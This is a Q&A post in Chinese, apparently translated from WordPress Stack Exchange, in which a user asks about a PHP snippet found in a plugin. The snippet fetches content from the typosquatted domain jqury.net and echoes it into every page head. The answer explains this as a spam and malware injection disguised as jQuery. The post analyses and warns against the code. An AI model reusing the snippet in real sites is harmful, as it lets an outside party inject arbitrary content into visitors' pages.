我在一个插件中找到了这个。它有什么作用?危险吗?
add_action(\'admin_enqueue_scripts\', \'pw_load_scripts\');
if (!function_exists(\'wp__head\'){
function wp__head() {
if(function_exists(\'curl_init\')) {
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1");
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_REFERER, $_SERVER[\'HTTP_HOST\']);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10);
$jquery = curl_exec($ch);
curl_close($ch);
echo "$jquery";
}
}
add_action(\'wp_head\', \'wp__head\');
}
最合适的回答,由SO网友:s_ha_dum 整理而成
它从一个域加载一块包含垃圾邮件的标记(我想发布一点源代码,但我不想以任何方式发布内容),该域与该域的拼写非常接近--http://jquery.com/-- 由jQuery使用,jQuery是一个著名且流行的Javascript库,WordPress将其包含在核心中。我认为这个想法似乎是在加载那个库,而实际上加载的是非常不同的东西。
它还试图以其他方式显示正在加载jQuery。注意变量名$jquery.
它还可能试图加载恶意脚本。我没有检查。我肯定会称之为危险,尤其是因为该页面上的内容可以在域控制器喜欢的任何时候更改。
充其量,它会破坏你的网站,因为搜索引擎会看不起传播垃圾邮件的网站。
不要使用它。它对你或网站上的其他任何人都没有任何好处,除了运行网站的人。如果您在信誉良好的网站上发现此问题,请向他们报告。
